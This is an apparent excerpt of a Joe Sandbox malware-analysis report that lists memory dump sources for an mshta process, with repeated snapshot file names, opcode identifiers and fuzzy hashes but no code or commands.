                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383159592.000000000C112000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C113000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c112000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ba7bfdcc4f63456ba48f80254ab7390b0e292084408aa9a4e25eaedad9c239b0
                                                                                                                                                                                                                                • Instruction ID: 14613cb0ca87c3f31ef406e88fb5e2bc1b719ab1310f020238e86d6f6ad1fe7b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba7bfdcc4f63456ba48f80254ab7390b0e292084408aa9a4e25eaedad9c239b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39E0612160C2D8DCE716D26568157E8FF145B03648F8A41F3DA7457163975D48C883A3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383020198.000000000C118000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C115000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7c1095690e71e86c669f599d76b4c52611e77295cde6ee98c0aa0fa391f450a1
                                                                                                                                                                                                                                • Instruction ID: 887a1fa868f964908071ce31a7a4e701ddc49078b8f93d55f806e1ce9a7ee52d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1095690e71e86c669f599d76b4c52611e77295cde6ee98c0aa0fa391f450a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26C012337491008B8700CE8CECC0899FB98FB881B8B1483B6EE08CB622D651D82487D1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383020198.000000000C118000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C116000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7c1095690e71e86c669f599d76b4c52611e77295cde6ee98c0aa0fa391f450a1
                                                                                                                                                                                                                                • Instruction ID: 887a1fa868f964908071ce31a7a4e701ddc49078b8f93d55f806e1ce9a7ee52d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1095690e71e86c669f599d76b4c52611e77295cde6ee98c0aa0fa391f450a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26C012337491008B8700CE8CECC0899FB98FB881B8B1483B6EE08CB622D651D82487D1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383020198.000000000C118000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C118000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7c1095690e71e86c669f599d76b4c52611e77295cde6ee98c0aa0fa391f450a1
                                                                                                                                                                                                                                • Instruction ID: 887a1fa868f964908071ce31a7a4e701ddc49078b8f93d55f806e1ce9a7ee52d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1095690e71e86c669f599d76b4c52611e77295cde6ee98c0aa0fa391f450a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26C012337491008B8700CE8CECC0899FB98FB881B8B1483B6EE08CB622D651D82487D1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383020198.000000000C118000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C11C000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7c1095690e71e86c669f599d76b4c52611e77295cde6ee98c0aa0fa391f450a1
                                                                                                                                                                                                                                • Instruction ID: 887a1fa868f964908071ce31a7a4e701ddc49078b8f93d55f806e1ce9a7ee52d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1095690e71e86c669f599d76b4c52611e77295cde6ee98c0aa0fa391f450a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26C012337491008B8700CE8CECC0899FB98FB881B8B1483B6EE08CB622D651D82487D1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
